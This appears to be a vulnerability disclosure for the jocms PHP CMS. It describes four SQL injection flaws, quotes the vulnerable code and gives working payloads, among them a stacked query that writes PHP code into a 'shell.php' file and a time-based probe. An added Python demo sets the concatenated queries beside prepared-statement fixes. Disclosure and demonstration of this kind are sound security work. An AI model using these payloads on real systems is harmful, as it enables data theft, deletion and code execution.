1. SQL Injection vulnerability

In jocms/apps/mask/inc/mask.php line 18~23:

```php
$decoded = jo_json_check();
if($decoded == false){
    throw new Exception($JO_LANG['ERR_INP_JSON']);
}
$mask = jo_get_masks($decoded["id"])[0];
```
function jo_json_check() will return JSON data submitted by users:

```php
function jo_json_check(){
    if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
        return false;
    }
    $contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
    if(strpos(strtolower($contentType), 'application/json') != 0){
        return false;
    }
    $content = trim(file_get_contents("php://input"));
    $decoded = json_decode($content, true);
    if(!is_array($decoded)){
        return false;
    }
    return $decoded;
}
```
then jo_get_masks() will execute the SQL statement:

```php
function jo_get_masks($id){
    $condition = "";
    $masks = [];
    if($id != "all"){
        $condition = " WHERE id='".$id."' ";
    }else{
        $condition = " WHERE type='mask' ";
    }
    $code;
    $handle = jocms_db_link();
    $result = $handle->query("SELECT * FROM masks ".$condition." ORDER BY name");
    while($output = $result->fetchArray()){
        $masks[] = $output;
    }
    return $masks;
}
```
There is no filtering for the input parameter, so we can use single quotation marks to close and inject. Payload:

```json
{"id":"1'union select 1,'hacked',3,sqlite_version(),5--"}
```
2. SQL Injection vulnerability

In jocms/apps/mask/inc/getmask.php line 16~21:

```php
$decoded = jo_json_check();
if($decoded == false){
    throw new Exception($JO_LANG['ERR_INP_JSON']);
}
$masks = jo_get_masks($decoded["content"]);
```
It's similar to the one above. Just change the id to content. Payload:

```json
{"content":"1'union select 1,'hacked',3,sqlite_version(),5--"}
```
3. SQL Injection vulnerability

In jocms/apps/mask/mask.php line 19~30:

```php
if(isset($_POST["saved"])){
    if(isset($_POST["id"]) AND isset($_POST["name"]) AND isset($_POST["code"])){
        $code = $_POST["code"];
        $code = str_replace(array("\r\n", chr(10).chr(13), "\r", "\n", PHP_EOL, chr(10), chr(13)),'--jo:r--', $code);
        $domobject = str_get_html ($code);
        $attr = "data-jo-content";
        $mask = $domobject->find("*", 0);
        $mask->$attr = "noneditable";
        $code = str_replace("--jo:r--", PHP_EOL, $domobject->save());
        jo_set_mask($_POST["id"], $_POST["name"], "mask", $code);
    }
}
```
User-controlled parameters are passed into the function jo_set_mask().
In jocms/core/inc/db.php line 253:

```php
function jo_set_mask($id, $name, $type, $code){
    $handle = jocms_db_link();
    if($id != 0){
        $return = $handle->exec("UPDATE masks SET name='".$name."', code='".$code."' WHERE id='".$id."'");
        $return = $id;
    }else{
        $return = $handle->exec("INSERT INTO masks(name,type,code) VALUES ('".$handle->escapeString($name)."','".$handle->escapeString($type)."','".$handle->escapeString($code)."')");
        $return = $handle->lastInsertRowid();
    }
    return $return;
}
```
No filtering for the parameters, so we can execute any SQL statement.
We can write PHP code with this:

```
saved=a&id=1';ATTACH DATABASE 'shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');&name=xxxxxxx&code=xxxxxxxx
```
visit:
4. SQL Injection vulnerability

In jocms/apps/mask/mask.php line 31~33:

```php
if(isset($_GET["deleted"]) AND isset($_GET["id"])){
    jo_delete_mask($_GET["id"]);
}
```

Follow the function jo_delete_mask():

```php
function jo_delete_mask($id){
    $handle = jocms_db_link();
    $result = $handle->query("DELETE FROM masks WHERE id='".$id."'");
    return $result;
}
```
No filtering for the parameter id, so we can inject. Use time-based injection:

```
?deleted=x&id=0'or+case+when(1=2)+then(randomblob(1000000000))else(0)end+or+'
```
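The following is an added example, not part of the report above and not jocms code. It reproduces the string-concatenation pattern of jo_get_masks() and jo_delete_mask() against an in-memory SQLite database in Python (chosen so it runs without a PHP interpreter), feeds it the report's UNION payload, and places the prepared-statement form beside it, which is the mitigation the fix commit describes. The five-column masks schema, the seed rows and the tautology variant of the delete payload (the report's `0'or ... or '` framing with the randomblob() delay removed) are constructed assumptions; the real jocms schema is not shown on the page.

```python
import sqlite3

# Constructed schema (an assumption; the page does not show the real jocms
# masks table). Five columns so that the report's UNION payload lines up.
SCHEMA = """
CREATE TABLE masks (
    id   INTEGER PRIMARY KEY,
    name TEXT,
    type TEXT,
    code TEXT,
    sort INTEGER
);
INSERT INTO masks(name, type, code, sort) VALUES ('header', 'mask', '<div>header</div>', 1);
INSERT INTO masks(name, type, code, sort) VALUES ('footer', 'mask', '<div>footer</div>', 2);
"""

# The "id" value from the JSON payload quoted in the report.
UNION_PAYLOAD = "1'union select 1,'hacked',3,sqlite_version(),5--"

# Constructed variant of the report's delete payload: same "0'or ... or '"
# framing, but a plain tautology instead of the randomblob() delay.
TAUTOLOGY_PAYLOAD = "0'or 1 or '"


def open_db():
    """Fresh in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_masks_vulnerable(conn, mask_id):
    """Same query construction as jo_get_masks(): the id is concatenated in."""
    if mask_id != "all":
        condition = " WHERE id='" + str(mask_id) + "' "
    else:
        condition = " WHERE type='mask' "
    sql = "SELECT * FROM masks " + condition + " ORDER BY name"
    return conn.execute(sql).fetchall()


def get_masks_safe(conn, mask_id):
    """Hardened form: the id travels as a bound parameter, never as SQL text."""
    if mask_id != "all":
        return conn.execute(
            "SELECT * FROM masks WHERE id=? ORDER BY name", (mask_id,)
        ).fetchall()
    return conn.execute(
        "SELECT * FROM masks WHERE type='mask' ORDER BY name"
    ).fetchall()


def delete_mask_vulnerable(conn, mask_id):
    """Same construction as jo_delete_mask(); returns the number of rows deleted."""
    cur = conn.execute("DELETE FROM masks WHERE id='" + str(mask_id) + "'")
    return cur.rowcount


def delete_mask_safe(conn, mask_id):
    """Hardened form of the delete: bound parameter, so the quote is just data."""
    cur = conn.execute("DELETE FROM masks WHERE id=?", (mask_id,))
    return cur.rowcount


def injected_rows(rows):
    """Rows that did not come from the masks table (the UNION's 'hacked' row)."""
    return [r for r in rows if r[1] == "hacked"]


def demo():
    """Run both endpoints with the payloads; returns the observable results."""
    conn = open_db()
    vuln = get_masks_vulnerable(conn, UNION_PAYLOAD)
    safe = get_masks_safe(conn, UNION_PAYLOAD)
    deleted_vuln = delete_mask_vulnerable(open_db(), TAUTOLOGY_PAYLOAD)
    deleted_safe = delete_mask_safe(open_db(), TAUTOLOGY_PAYLOAD)
    return {
        "vulnerable_injected": injected_rows(vuln),
        "safe_rows": safe,
        "vulnerable_deleted": deleted_vuln,
        "safe_deleted": deleted_safe,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Against the concatenated query the `--` swallows the trailing `' ORDER BY name` and the UNION row carrying sqlite_version() comes back as if it were a mask; with the same value bound as a parameter the whole string is compared as text against the integer id column and matches nothing. The delete endpoint behaves the same way: the tautology empties the table through concatenation and deletes nothing through the bound form, which is why the time-based probe in the report only works on the unpatched code.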
Implemented SQL prepared statements - injection mitigation
6ba8031
Fixes mxgbr#6